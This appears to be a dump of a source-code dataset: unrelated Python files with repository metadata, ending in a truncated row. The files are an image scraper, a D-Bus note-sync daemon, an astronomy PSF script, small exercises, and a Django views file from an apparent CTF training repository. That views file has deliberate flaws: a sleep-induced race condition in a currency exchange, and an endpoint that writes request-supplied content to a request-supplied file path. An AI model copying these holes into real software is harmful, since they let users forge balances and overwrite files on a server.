    if ch in vowel:
        print(ch)
|
[
"[email protected]"
] | |
c2e4537265eacfee364c3be61266d0a16861c951
|
dc39ccc50b7d34e5de84f3cc132c5cc096a32656
|
/BASIC/class/attribute.py
|
40377cc862a0cdd596c36046d3178d5438bfeccf
|
[] |
no_license
|
Shukladas1115/Python
|
0947aefd62a9ce4c3140360cb7259b031368709c
|
feb32bc2e2e7df377fc2d92330bfdacb83f31a55
|
refs/heads/master
| 2022-02-20T04:15:56.036495 | 2019-08-26T16:36:52 | 2019-08-26T16:36:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 442 |
py
|
# Demonstrates how class attributes are shared through inheritance.
class A(object):
    x = 1
class B(A):
    pass
class C(A):
    pass
print(A.x, B.x, C.x) # 1 1 1 -- B and C inherit A.x
B.x = 2
print(A.x, B.x, C.x) # 1 2 1 -- B now shadows A.x with its own attribute
A.x = 3
print(A.x, B.x, C.x) # 3 2 3 -- why? C still resolves x on A
'''
C doesn’t have its own x property, independent of A.
Thus, references to C.x are in fact references to A.x
C kế thừa từ A, C không thực sự sở hữu thuộc tính x mà nó tham chiếu đến thuộc tính x của A
'''
|
[
"[email protected]"
] | |
fa36d96624f3655b5258367533c44b0c14db498b
|
d364123a0655bff7e9d725382934fe2c15b5bfc4
|
/Crawler/lianxi/hsimg_test.py
|
bc62fc7c1c354c4ba3007bd3c78507f7a0a83c1e
|
[] |
no_license
|
yuan1093040152/SeleniumTest
|
88d75361c8419354f56856c326f843a0a89d7ca6
|
d155b98702bc46c174499042b43257696b861b5e
|
refs/heads/master
| 2023-08-31T15:00:25.415642 | 2023-08-30T09:26:42 | 2023-08-30T09:26:42 | 227,269,300 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,271 |
py
|
#coding=utf-8
'''
Created on 2018年7月15日
@author: kai.yangf
'''
import requests,re,time
from multiprocessing import pool
from requests.exceptions import RequestException
from threading import Thread
def get_one_page(url):
    """Fetch *url* and return the response body, or None on failure.

    Only a 200 status yields the HTML; any other status or a requests
    error returns None, which callers must handle.
    """
    try:
        response = requests.get(url)
        html = response.text
        if response.status_code == 200:
            print (True)  # debug: request succeeded
            print (html[:5])  # debug: peek at the start of the body
            return html
        else:
            return None
    except RequestException:
        return None
def parse_one_page(url):
    """Fetch the page at *url* and download every <img> src found in it."""
    page_html = get_one_page(url)
    img_pattern = re.compile('<img.*?alt.*?src="(.*?)" />', re.S)
    image_urls = re.findall(img_pattern, page_html)
    print (len(image_urls))
    for image_url in image_urls:
        writeIO(image_url)
def writeIO(item):
    """Download the image at url *item* and save it under E:\\CrawlerImg.

    Fix: dropped the redundant f.close() — the `with` block already closes
    the file on exit, so the explicit close was a no-op code smell.
    """
    filename = str(time.time()) + '.jpg'
    response = requests.get(item)
    Path = 'E:\\CrawlerImg\\' + filename
    with open(Path,'wb') as f:
        f.write(response.content)
def each_page(url):
    """Walk a listing page and hand each picture detail page to parse_one_page.

    Only hrefs that start with '/pic' and match '.html' are followed.
    """
    host = 'https://www.8484dd.com'
    html = get_one_page(url)
    pettern = re.compile('<li.*?<a.*?href="(.+?)".*?</a>',re.S)
    items = re.findall(pettern,html)
    print (len(items))
    for item in items:
        if re.match('/pic', item):
            # NOTE(review): '.html' is a regex — the dot matches any char.
            if re.search('.html', item):
                url = host + item
                parse_one_page(url)
def each_page_value(i):
    """Process picture listing page number *i*.

    Fix: the body previously duplicated each_page() line for line; it now
    builds the page URL and delegates, so the scraping logic lives in one
    place.
    """
    url = 'https://www.8484dd.com/pic/5/index_'+ str(i) +'.html'
    each_page(url)
def main(url):
    """Download all images referenced by the page at *url*.

    Fix: the old body fetched the page itself and then passed the raw HTML
    to parse_one_page(), which expects a URL (it fetches internally) — so
    requests.get() ended up being called on HTML text.
    """
    parse_one_page(url)
if __name__ == '__main__':
    # Scrape listing pages 2..10 concurrently, one thread per page.
    threads = [Thread(target=each_page_value, args=(i,)) for i in range(2, 11)]
    # Fix: the original indexed Threads[2..10], which never started the
    # first two threads and raised IndexError past index 8 (the list only
    # has 9 entries).  Iterate the list itself instead.
    for t in threads:
        t.start()
    for t in threads:
        t.join()
|
[
"[email protected]"
] | |
f4c38240821bf96e65612f342986cf276694f90d
|
34578a08451dc124f02fbba92a219da3347059cd
|
/.history/tools/views_20190502130213.py
|
5ef8462e7964c7373832387076323b91f3acac43
|
[] |
no_license
|
gwjczwy/CTF-Exercises
|
b35d938b30adbc56c1b6f45dc36cea1421c702fb
|
c2d5c47f5047b1601564453e270ce50aad7f56fc
|
refs/heads/master
| 2020-05-25T23:51:26.190350 | 2019-05-22T13:18:59 | 2019-05-22T13:18:59 | 188,042,255 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,399 |
py
|
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from json import dumps
from .models import Url,Money
import time
#########################
# Configuration variables
# Absolute path of the source archive served by downSource().
sourcePath=r'C:\Users\arnoux\Desktop\训练平台\sql\log.txt'
#########################
# Home page
@login_required
def index(requests):
    """Render the tools home page for the logged-in user."""
    data={'toolname':'index','user':requests.user}
    return render(requests,'tools/index.html',data)
#########################
# Short-link tool
@login_required
def surl(requests):# short-link index page
    """Render the short-link tool's index page."""
    data={}
    data['toolName']="surl"
    data['parameter']="index"
    return render(requests, 'tools/index.html', data)
def surls(requests,parameter):# redirect for a short-link slug
    """Resolve short-link *parameter* and redirect to the stored full URL.

    NOTE(review): unlike the sibling views there is no @login_required
    here, the except clause is bare, and the redirect is emitted via an
    inline <script> — confirm all are intentional (CTF training code).
    """
    data={}
    data['toolName']="surl"
    data['parameter']="link"
    print('短链接参数',parameter)
    try:
        req=Url.objects.get(sUrl=parameter)
        print('获取对象成功')
    except:
        return HttpResponse('你来错地方了,悟空')
    req=req.fullUrl
    return HttpResponse('<script>window.location.href="'+req+'";</script>')
@csrf_exempt
@login_required
def createSUrl(requests):
    """Create a short link for the POSTed fullUrl and return it as JSON.

    Fix: the original regenerated randUrl once more *after* the uniqueness
    loop ended, discarding the slug that had just been verified unique and
    saving an unchecked one instead (rare duplicate-key risk).
    """
    if not (requests.method == 'POST' and requests.POST['fullUrl']):
        req={'message':'fail'}
        return HttpResponse(dumps(req),content_type="application/json")
    fullUrl=requests.POST['fullUrl']
    while True:
        randUrl=randStr(5)# random 5-character slug
        try:
            Url.objects.get(sUrl=randUrl)# collision: slug exists, try again
            print('再!来!一!次!')
        except:
            break
    Url(sUrl=randUrl,fullUrl=fullUrl).save()
    req={'message':'success','url':randUrl}
    return HttpResponse(dumps(req),content_type="application/json")
def randStr(l):
    """Return a random alphanumeric string of length *l*.

    Fix: removed the unused `import string` and replaced the manual
    append-then-join loop with a generator expression.
    NOTE: `random` is not cryptographically secure; these slugs are not
    security tokens.
    """
    import random
    seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    return ''.join(random.choice(seed) for _ in range(l))
#########################
# Shop tool
@login_required
def shop(requests):
    """Render the shop page with the user's currency balances."""
    data={}
    data['toolName']="shop"
    money = Money.objects.get(user=requests.user)
    data['money']=money
    return render(requests, 'tools/index.html', data)
# Shop currency exchange
@csrf_exempt
@login_required
def shopExchange(requests):
    """Exchange between monero and bitcoin for the logged-in user.

    POST params: rule ('m2b' or 'b2m') and num (a non-negative integer).
    NOTE(review): the time.sleep(5) between crediting and debiting is a
    deliberately introduced race-condition window (the original comment
    says so; this is CTF training code) — do not "fix" it.
    """
    if not (requests.method == 'POST' and 'rule' in requests.POST and 'num' in requests.POST):
        print('非法请求')
        req={'message':'fail','reason':'非法请求'}
        return HttpResponse(dumps(req),content_type="application/json")
    rule=requests.POST['rule']
    num=requests.POST['num']
    if not rule in ['m2b','b2m']:# validate the conversion rule
        print('rule参数不合法')
        req={'message':'fail','reason':'rule参数不合法'}
        return HttpResponse(dumps(req),content_type="application/json")
    if num.isdigit():# validate the amount
        num=int(num)
        if num<0:
            req={'message':'fail','reason':'非法参数'}
            return HttpResponse(dumps(req),content_type="application/json")
    else:
        req={'message':'fail','reason':'非法参数'}
        return HttpResponse(dumps(req),content_type="application/json")
    # fetch the user's wallet
    money = Money.objects.get(user=requests.user)
    if rule=='m2b':
        if money.monero>=num:
            money.bitcoin+=num
            money.save()
            time.sleep(5) # delay that opens the race-condition window
            money.monero-=num
            money.save()
        else:
            req={'message':'fail','reason':'monero 不足'}
            return HttpResponse(dumps(req),content_type="application/json")
    elif rule=='b2m':
        if money.bitcoin>=num:
            money.monero+=num
            money.save()
            time.sleep(5)
            money.bitcoin-=num
            money.save()
        else:
            req={'message':'fail','reason':'bitcoin 不足'}
            return HttpResponse(dumps(req),content_type="application/json")
    else:
        req={'message':'fail','reason':'未知错误'}
        return HttpResponse(dumps(req),content_type="application/json")
    req={'message':'success','monero':money.monero,'bitcoin':money.bitcoin}
    return HttpResponse(dumps(req),content_type="application/json")
#########################
# Log tool
@login_required
def logs(requests):
    """Render the log tool page."""
    data={}
    data['toolName']="logs"
    return render(requests, 'tools/index.html', data)
# Add a log entry (costs 100 bitcoin)
@csrf_exempt
@login_required
def addLog(requests):
    """Append POSTed content to a user-supplied file path, charging 100 bitcoin.

    NOTE(review): `path` comes straight from the request, so this is an
    arbitrary file write — presumably the intended vulnerability of this
    CTF training view; confirm before hardening.
    """
    if not (requests.method == 'POST' and 'path' in requests.POST and 'content' in requests.POST):
        req={'message':'fail','reason':'非法请求'}
        return HttpResponse(dumps(req),content_type="application/json")
    path=requests.POST['path']
    content=requests.POST['content']
    # fetch the user's wallet
    money = Money.objects.get(user=requests.user)
    if money.bitcoin >=100:
        try:
            with open(path,'at') as file:
                file.write(content)
            money.bitcoin-=100
            money.save()
            req={'message':'success','reason':'操作成功'}
            return HttpResponse(dumps(req),content_type="application/json")
        except:
            req={'message':'fail','reason':'写入文件错误'}
            return HttpResponse(dumps(req),content_type="application/json")
    else:
        req={'message':'fail','reason':'货币不足'}
        return HttpResponse(dumps(req),content_type="application/json")
# Fetch logs (stub)
def getLog(requests):
    """Stub endpoint: always returns failure.

    NOTE(review): the 'reason' text ('货币不足' = insufficient funds) looks
    copy-pasted from addLog, and there is no @login_required — confirm intent.
    """
    req={'message':'fail','reason':'货币不足'}
    return HttpResponse(dumps(req),content_type="application/json")
# Download the source archive (costs 1000 bitcoin)
def downSource(requests):
    """Serve the file at sourcePath as an attachment, charging 1000 bitcoin.

    NOTE(review): no @login_required here, and the opened file handle is
    never explicitly closed — confirm both are acceptable for this exercise.
    """
    # fetch the user's wallet
    money = Money.objects.get(user=requests.user)
    if money.bitcoin >=1000:
        money.bitcoin-=1000
        money.save()
        file = open(sourcePath, 'rb')
        response = HttpResponse(file)
        response['Content-Type'] = 'application/octet-stream' # tell the browser this is a file download
        response['Content-Disposition'] = 'attachment;filename="'+sourcePath.split('\\')[-1]+'";'
        return response
    else:
        req={'message':'fail','reason':'货币不足'}
        return HttpResponse(dumps(req),content_type="application/json")
|
[
"[email protected]"
] | |
31f64762cb63b1fbd9b34933a297a9ed4438eddb
|
ffad0de28109d0156baba92b5793e6d8142ced7c
|
/server/channels_list_test.py
|
84b54743e63a3c4deed2798a8d9a3f3a3ced6293
|
[] |
no_license
|
nomii15/COMP1531-server
|
823753e11b78619b7f67c32d9f5f1f39d839b6f8
|
af00ba90cdf2fa1ce5170a7a2bf506bfe550bbd7
|
refs/heads/master
| 2021-07-17T08:26:57.074709 | 2019-11-17T07:29:44 | 2019-11-17T07:29:44 | 228,518,923 | 1 | 0 | null | 2021-01-05T18:13:55 | 2019-12-17T02:47:02 |
Python
|
UTF-8
|
Python
| false | false | 1,550 |
py
|
import pytest
from channels_list import channels_list
from auth_register import auth_register
from channels_create import channels_create
'''
Provide a list of all channels (and their associated details) that the authorised user is part of
'''
def test_list_one():
    """A user who joined exactly one channel sees only that channel listed."""
    # setup: register a user and create a single channel as them
    account = auth_register("[email protected]", "validpassword1", "USER1", "validname1")
    token = account['token']
    user_id = account['u_id']
    created = channels_create(token, 'channel1', True)
    expected = {'channels': [{'channel_id': 1, 'name': 'channel1'}]}
    # the listing must contain exactly the one channel the user is in
    assert channels_list(token) == expected
def test_list_empty():
    """A user who belongs to no channels gets an empty channel list."""
    # setup: three users; only the first two create channels
    reg_a = auth_register("[email protected]", "validpassword2", "USER2", "validname2")
    token_a = reg_a['token']
    uid_a = reg_a['u_id']
    reg_b = auth_register("[email protected]", "validpassword3", "USER3", "validname3")
    token_b = reg_b['token']
    uid_b = reg_b['u_id']
    reg_c = auth_register("[email protected]", "validpassword4", "USER4", "validname4")
    token_c = reg_c['token']
    uid_c = reg_c['u_id']
    channels_create(token_a, 'channel2', True)
    channels_create(token_b, 'channel3', True)
    # the third user joined nothing, so their listing is empty
    assert channels_list(token_c) == {'channels' : []}
|
[
"[email protected]"
] | |
a4aa71959c2f1c3dce79168ddb51c85bfaa1899c
|
cdee5cc20a5085b40f8555e7199fe19403e005c3
|
/experimental/graphicalClassification/MultiClassMajorityVote.py
|
e02402ed226105cb3faf7d5e5aab05424c9616b6
|
[
"Apache-2.0"
] |
permissive
|
visenger/aggregation
|
1e908d11df701e900d94d6545f3cc35a6c7dc915
|
82dce87eaaf14b0b2bedd29fc82c026fda2a0138
|
refs/heads/master
| 2020-03-19T03:08:52.140663 | 2017-06-21T10:32:27 | 2017-06-21T10:32:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 638 |
py
|
#!/usr/bin/env python
from __future__ import print_function
__author__ = 'greghines'
class MultiClassMajorityVote:
    """Majority-vote aggregation over multiple classification attributes."""
    def __init__(self,subjectNodes,userNodes):
        # graph nodes being classified, and the users who classified them
        self.subjectNodes = subjectNodes
        self.userNodes = userNodes
        # threshold parameter; its use is not visible in this view — TODO confirm
        self.alpha = 0.6
    def __classify__(self,attributeList):
        """Point every user and subject node at each attribute in turn."""
        for att in attributeList:
            for user in self.userNodes:
                user.__changeClassificationAttributes__(att)
            for subject in self.subjectNodes:
                subject.__changeClassificationAttributes__(att)
                #what alpha value would this subject need to get correct positive?
[
"[email protected]"
] | |
a2e495fdc47015c860dc2e716dfa6d8a401a6538
|
0b40232eb2395c27353c892ef4ccb5c604bb75be
|
/Array/third_max.py
|
174029680ba012a49f9c34cb0d61196da859ba00
|
[] |
no_license
|
HareshNasit/LeetCode
|
971ae9dd5e4f0feeafa5bb3bcf5b7fa0a514d54d
|
674728af189aa8951a3fcb355b290f5666b1465c
|
refs/heads/master
| 2021-06-18T07:37:40.121698 | 2021-02-12T12:30:18 | 2021-02-12T12:30:18 | 168,089,751 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 366 |
py
|
def thirdMax(self, nums):
"""
https://leetcode.com/problems/third-maximum-number/submissions/
:type nums: List[int]
:rtype: int
"""
nums_set = set(nums)
nums_list = list(nums_set)
nums_list.sort(reverse = True)
if len(nums_list) > 2:
return nums_list[2]
return nums_list[0]
|
[
"[email protected]"
] | |
39ddeb9ad873ed4901adbf3640031f907f3503a3
|
2b5bc632859ca01b6b2feae6186b1314ed8c5187
|
/everpad/provider/daemon.py
|
5b6b49be3c92f2d0a2ee5e6669c92c7f6b8189b9
|
[] |
no_license
|
mcardillo55/everpad
|
c64e2d35bd4ccceff901d9720030dbb8adfcef56
|
ab6271a5b73eedf81d0c31e351e567282dbd6685
|
refs/heads/master
| 2020-12-25T05:55:05.811394 | 2012-12-19T03:36:25 | 2012-12-19T03:36:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,175 |
py
|
import sys
sys.path.insert(0, '../..')
from everpad.provider.service import ProviderService
from everpad.provider.sync import SyncThread
from everpad.provider.tools import set_auth_token, get_db_session
from everpad.tools import get_auth_token, print_version
from everpad.provider import models
from PySide.QtCore import Slot, QSettings
import dbus
import dbus.mainloop.glib
import signal
import fcntl
import os
import getpass
import argparse
# KDE needs a QWidget-capable QApplication for wallet access; other desktops
# get a plain QCoreApplication.
# Fix: DESKTOP_SESSION may be unset, and `'kde' in None` raises TypeError,
# so default the lookup to the empty string.
if 'kde' in os.environ.get('DESKTOP_SESSION', ''):
    from PySide.QtGui import QApplication
    App = QApplication
else:
    from PySide.QtCore import QCoreApplication
    App = QCoreApplication
class ProviderApp(App):
    """Application object: exports the D-Bus provider service and runs sync."""
    def __init__(self, verbose, *args, **kwargs):
        App.__init__(self, *args, **kwargs)
        self.settings = QSettings('everpad', 'everpad-provider')
        self.verbose = verbose
        session_bus = dbus.SessionBus()
        # Claim the well-known bus name and export the service object.
        self.bus = dbus.service.BusName("com.everpad.Provider", session_bus)
        self.service = ProviderService(self, session_bus, '/EverpadProvider')
        self.sync_thread = SyncThread(self)
        # Relay sync-thread signals out through the D-Bus service.
        self.sync_thread.sync_state_changed.connect(
            Slot(int)(self.service.sync_state_changed),
        )
        self.sync_thread.data_changed.connect(
            Slot()(self.service.data_changed),
        )
        # Only start syncing if an auth token is already stored.
        if get_auth_token():
            self.sync_thread.start()
        self.service.qobject.authenticate_signal.connect(
            self.on_authenticated,
        )
        self.service.qobject.remove_authenticate_signal.connect(
            self.on_remove_authenticated,
        )
    @Slot(str)
    def on_authenticated(self, token):
        """Persist the new token and begin synchronisation."""
        set_auth_token(token)
        self.sync_thread.start()
    @Slot()
    def on_remove_authenticated(self):
        """Stop syncing, clear the token, and purge all locally cached data."""
        self.sync_thread.quit()
        set_auth_token('')
        session = get_db_session()
        session.query(models.Note).delete(
            synchronize_session='fetch',
        )
        session.query(models.Resource).delete(
            synchronize_session='fetch',
        )
        session.query(models.Notebook).delete(
            synchronize_session='fetch',
        )
        session.query(models.Tag).delete(
            synchronize_session='fetch',
        )
        session.commit()
    def log(self, data):
        """Print *data* when verbose mode is on (Python 2 print statement)."""
        if self.verbose:
            print data
def main():
    """Entry point: single-instance lock, data dirs, CLI args, then run the app."""
    signal.signal(signal.SIGINT, signal.SIG_DFL)
    # Per-user lock file ensures only one provider instance runs at a time;
    # lockf raises if another instance already holds it.
    fp = open('/tmp/everpad-provider-%s.lock' % getpass.getuser(), 'w')
    fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
    try:
        os.mkdir(os.path.expanduser('~/.everpad/'))
        os.mkdir(os.path.expanduser('~/.everpad/data/'))
    except OSError:
        # Directories already exist.
        pass
    parser = argparse.ArgumentParser()
    parser.add_argument('--verbose', action='store_true', help='verbose output')
    parser.add_argument('--version', '-v', action='store_true', help='show version')
    args = parser.parse_args(sys.argv[1:])
    if args.version:
        print_version()
    dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
    app = ProviderApp(args.verbose, sys.argv)
    app.exec_()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
13f9fc971c3c8582a7f8e5715f7b253fbbd05b76
|
17ca5bae91148b5e155e18e6d758f77ab402046d
|
/analysis_ACS/CID3570/first_analysis/cut_PSFs_in_analysis.py
|
618268eb935438571ce91984e37bd80070f991f4
|
[] |
no_license
|
dartoon/QSO_decomposition
|
5b645c298825091c072778addfaab5d3fb0b5916
|
a514b9a0ad6ba45dc9c3f83abf569688b9cf3a15
|
refs/heads/master
| 2021-12-22T19:15:53.937019 | 2021-12-16T02:07:18 | 2021-12-16T02:07:18 | 123,425,150 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,011 |
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 31 13:54:02 2018
@author: Dartoon
"""
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import LogNorm
import sys
sys.path.insert(0,'../../py_tools')
from cut_image import cut_image, cut_center_bright, save_loc_png, grab_pos
import copy
import astropy.io.fits as pyfits
import os
path = os.getcwd()
ID = path.split('/')[-1]
fitsFile = pyfits.open('../../Cycle25data/ACS_data/{0}_acs_I_mosaic_180mas_sci.fits'.format(ID))
img = fitsFile[0].data # check the back grounp
#from astropy.visualization import SqrtStretch
#from astropy.stats import SigmaClip
#from photutils import Background2D, SExtractorBackground
#from astropy.visualization.mpl_normalize import ImageNormalize
#norm = ImageNormalize(stretch=SqrtStretch())
#sigma_clip = SigmaClip(sigma=3., iters=10)
#bkg_estimator = SExtractorBackground()
#from photutils import make_source_mask
#mask_0 = make_source_mask(img, snr=2, npixels=5, dilate_size=11)
#mask_1 = (np.isnan(img))
#mask = mask_0 + mask_1
#bkg = Background2D(img, (50, 50), filter_size=(3, 3),
# sigma_clip=sigma_clip, bkg_estimator=bkg_estimator,
# mask=mask)
#fig=plt.figure(figsize=(15,15))
#ax=fig.add_subplot(1,1,1)
#ax.imshow(img, norm=LogNorm(), origin='lower')
##bkg.plot_meshes(outlines=True, color='#1f77b4')
#ax.xaxis.set_visible(False)
#ax.yaxis.set_visible(False)
#plt.show()
#fig=plt.figure(figsize=(15,15))
#ax=fig.add_subplot(1,1,1)
#ax.imshow(mask, origin='lower')
##bkg.plot_meshes(outlines=True, color='#1f77b4')
#ax.xaxis.set_visible(False)
#ax.yaxis.set_visible(False)
#plt.show()
#
#back = bkg.background* ~mask_1
#fig=plt.figure(figsize=(15,15))
#ax=fig.add_subplot(1,1,1)
#ax.imshow(back, origin='lower', cmap='Greys_r')
#ax.xaxis.set_visible(False)
#ax.yaxis.set_visible(False)
#plt.show()
#
#img -= back
#pyfits.PrimaryHDU(img).writeto('sub_coadd.fits',overwrite=True)
#img = pyfits.getdata('sub_coadd.fits')
filename= '{0}.reg'.format(ID)
c_psf_list, QSO_loc = grab_pos(filename,reg_ty = 'acs', QSO_reg_return=True)
center_QSO = c_psf_list[QSO_loc]
QSO, cut_center = cut_center_bright(image=img, center=center_QSO, radius=60, return_center=True, plot=False)
QSO_outer = cut_image(image=img, center=cut_center, radius=200)
pyfits.PrimaryHDU(QSO).writeto('{0}_cutout.fits'.format(ID),overwrite=True)
pyfits.PrimaryHDU(QSO_outer).writeto('{0}_cutout_outer.fits'.format(ID),overwrite=True)
PSFs = []
PSF_gauss_centers = []
PSF_bright_centers = []
count=0
#psf_list = None
psf_list = np.delete(c_psf_list, (QSO_loc), axis=0)
dist = (psf_list-center_QSO)[:,0]**2+(psf_list-center_QSO)[:,1]**2
psf_list = psf_list[dist.argsort()]
for i in range(len(psf_list)):
print 'PSF',i
PSF, PSF_center = cut_center_bright(image=img, center=psf_list[i], radius=60, return_center=True, plot=False)
PSFs.append([PSF, 1, PSF_center])
PSF_gauss_centers.append(PSF_center)
_, PSF_br_center = cut_center_bright(image=img, center=psf_list[i], radius=60, kernel = 'center_bright', return_center=True, plot=False)
PSF_bright_centers.append(PSF_br_center)
count += 1
#extra_psfs = None
extra_psfs = np.array([[1479.9762,3554.7075], [5409.6929,4718.4676], [2870.2585,4735.0797], [1065.9795,1476.4033]])
dist_extra = (extra_psfs-center_QSO)[:,0]**2+(extra_psfs-center_QSO)[:,1]**2
extra_psfs = extra_psfs[dist_extra.argsort()]
for i in range(len(extra_psfs)):
print 'PSF',count
PSF, PSF_center = cut_center_bright(image=img, center=extra_psfs[i], radius=60, return_center=True, plot=False)
PSFs.append([PSF,0, PSF_center])
PSF_gauss_centers.append(PSF_center)
_, PSF_br_center = cut_center_bright(image=img, center=extra_psfs[i], radius=60, kernel = 'center_bright', return_center=True, plot=False)
PSF_bright_centers.append(PSF_br_center)
count += 1
from mask_objects import mask_obj
print "QSO:"
a, QSO_mask = mask_obj(img=QSO, exp_sz=1.4)
if len(QSO_mask) > 1:
QSO_mask = np.sum(np.asarray(QSO_mask),axis=0)
elif len(QSO_mask) == 1:
QSO_mask = QSO_mask[0]
#print "QSO image:"
#plt.imshow((QSO_mask), origin='lower')
#plt.show()
QSO_mask = (1 - (QSO_mask != 0)*1.)
PSF_msk_list = []
for i in range(len(PSFs)):
print "PSF{0}:".format(i)
_, PSF_mask = mask_obj(img=PSFs[i][0], snr=3., exp_sz=2.4)
if len(PSF_mask) > 1:
PSF_mask = np.sum(np.asarray(PSF_mask),axis=0)
elif len(PSF_mask) == 1:
PSF_mask = PSF_mask[0]
# print "PSF{0} image:".format(i)
# plt.imshow(PSF_mask, origin='lower')
# plt.show()
PSF_mask = (1 - (PSF_mask != 0)*1.)
if i in PSF_msk_list:
PSF_mask = PSF_mask*0 + 1
print "PSF", i, "not use this mask"
PSFs[i].append(PSF_mask)
center_match = (np.sum(abs(np.asarray(PSF_gauss_centers)-np.asarray(PSF_bright_centers)),axis = 1) == 0)
PSFs_all = copy.deepcopy(PSFs)
PSFs=[]
for i in range(len(PSFs_all)):
if center_match[i] == True:
print i
PSFs.append(PSFs_all[i])
#==============================================================================
# Compare the FWHM
#==============================================================================
from measure_FWHM import measure_FWHM
FWHM = []
for i in range(len(PSFs)):
FWHM_i = measure_FWHM(PSFs[i][0])[0]
print "The measued FWHM for PSF", i, ":", FWHM_i
FWHM.append(FWHM_i)
FWHM = np.asarray(FWHM)
#==============================================================================
# Compare the profile and derive the Average image
#==============================================================================
flux_list = []
for i in range(len(PSFs)):
flux = np.sum(PSFs[i][0]*PSFs[i][3])
print "tot_flux for PSF{0}".format(i), flux
flux_list.append(flux)
del_list = [0,3]
PSFs = [PSFs[i] for i in range(len(PSFs)) if i not in del_list]
#plot the first selection
if extra_psfs is None:
save_loc_png(img,center_QSO,psf_list, ID=ID, label='ini' ,reg_ty = 'acs')
else:
save_loc_png(img,center_QSO,psf_list,extra_psfs, ID=ID, label='ini', reg_ty = 'acs')
PSFs_familiy = [PSFs[i][1] for i in range(len(PSFs))]
if extra_psfs is None:
loc_PSFs = psf_list
elif psf_list is None:
loc_PSFs = extra_psfs
else:
loc_PSFs = np.append(psf_list, extra_psfs, axis=0)
loc_ind_star = [PSFs[i][2] for i in range(len(PSFs)) if PSFs[i][1]==1] #and flux_list[i]>100]
loc_like_star = [PSFs[i][2] for i in range(len(PSFs)) if PSFs[i][1]==0] # and flux_list[i]>100]
if PSFs_familiy[-1] ==1:
save_loc_png(img,center_QSO,loc_ind_star, ID=ID,reg_ty = 'acs')
else:
save_loc_png(img,center_QSO,loc_ind_star,loc_like_star, ID=ID,reg_ty = 'acs')
PSF_list = [PSFs[i][0] for i in range(len(PSFs))]
PSF_masks = [PSFs[i][3] for i in range(len(PSFs))]
from flux_profile import QSO_psfs_compare
gridsp_l = ['log', None]
if_annuli_l = [False, True]
for i in range(2):
for j in range(2):
plt_which_PSF = None
plt_QSO = False
# if i+j == 0:
# plt_which_PSF = range(len(PSFs))
# plt_QSO = True
fig_psf_com = QSO_psfs_compare(QSO=QSO, QSO_msk=QSO_mask, psfs= PSF_list,
plt_which_PSF=plt_which_PSF,
PSF_mask_img=PSF_masks, grids=30,
include_QSO=True,
plt_QSO = plt_QSO, norm_pix = 5.0,
gridspace= gridsp_l[i], if_annuli=if_annuli_l[j])
# fig_psf_com.savefig('PSFvsQSO{0}_{1}_{2}.pdf'.format(i,['xlog','xlin'][i],['circ','annu'][j]))
if j==1:
plt.show()
else:
plt.close()
import pickle
filename='{0}_PSFs_QSO'.format(ID)
datafile = open(filename, 'wb')
QSOs = [QSO,cut_center]
pickle.dump([PSFs, QSOs], open(filename, 'wb'))
datafile.close()
#import pickle
#datafile = open('{0}_PSFs_QSO'.format(ID),'rb')
#PSFs, QSO=pickle.load(open('XID2202_PSFs_QSO','rb'))
#datafile.close()
|
[
"[email protected]"
] | |
08de3983cade375a46349f7de656f9ca3a921a9e
|
89b45e528f3d495f1dd6f5bcdd1a38ff96870e25
|
/PythonCrashCourse/chapter_06/exercise6_05.py
|
b03a04f3a086ec1337414ecd27d147eb1ba55d24
|
[] |
no_license
|
imatyukin/python
|
2ec6e712d4d988335fc815c7f8da049968cc1161
|
58e72e43c835fa96fb2e8e800fe1a370c7328a39
|
refs/heads/master
| 2023-07-21T13:00:31.433336 | 2022-08-24T13:34:32 | 2022-08-24T13:34:32 | 98,356,174 | 2 | 0 | null | 2023-07-16T02:31:48 | 2017-07-25T22:45:29 |
Python
|
UTF-8
|
Python
| false | false | 660 |
py
|
#!/usr/bin/env python3
"""Report which country each river runs through, then list the rivers
and countries that were mentioned."""

rivers = {
    'amazon': 'brasil',
    'nile': 'egypt',
    'mississippi': 'usa',
}

for river, country in rivers.items():
    # 'usa' is an acronym, so it is upper-cased rather than title-cased.
    shown = country.upper() if river == 'mississippi' else country.title()
    print(f"The {river.title()} runs through {shown}.")

print("\nThe following rivers have been mentioned:")
for river in set(rivers):
    print(river.title())

print("\nThe following countries have been mentioned:")
for country in set(rivers.values()):
    print(country.upper() if country == 'usa' else country.title())
|
[
"[email protected]"
] | |
68a5556339d6c4ba6f854be0cda3f296574eaf67
|
5981fc46a2e033b1c8b3f49449ee55c3dbcc17c6
|
/allopathy/views.py
|
ec56988bb3024a45ff6d4c154ecd36f652af9285
|
[] |
no_license
|
shamitlal/Medical-Website
|
619ad0aa18dc69fe13cb5850d4de6a177d41d6ca
|
17d3f1387c65f5bda547894d002ef22143484158
|
refs/heads/master
| 2021-01-13T14:50:44.216726 | 2016-12-14T19:03:25 | 2016-12-14T19:03:25 | 76,488,492 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 148 |
py
|
from django.shortcuts import render
# Create your views here.
def allopathy(request):
    """Render the static allopathy landing page.

    Args:
        request: the incoming Django HttpRequest.

    Returns:
        HttpResponse produced by rendering ``allopathy/allopathy.html``
        with an empty context.
    """
    return render(request, 'allopathy/allopathy.html', {})
|
[
"[email protected]"
] | |
806594d6287d004b7f59fd97bde8ccda5942dc4a
|
17d531819123ea09fef201353efcbee4e8ff8097
|
/reduce/owner/permissions.py
|
7566e4734a5b33e2760e0341428f1d01cee25dce
|
[] |
no_license
|
showmethepeach/Re.duce
|
07a00463c02c572d6e96e177ea0ef5e6e615c2ad
|
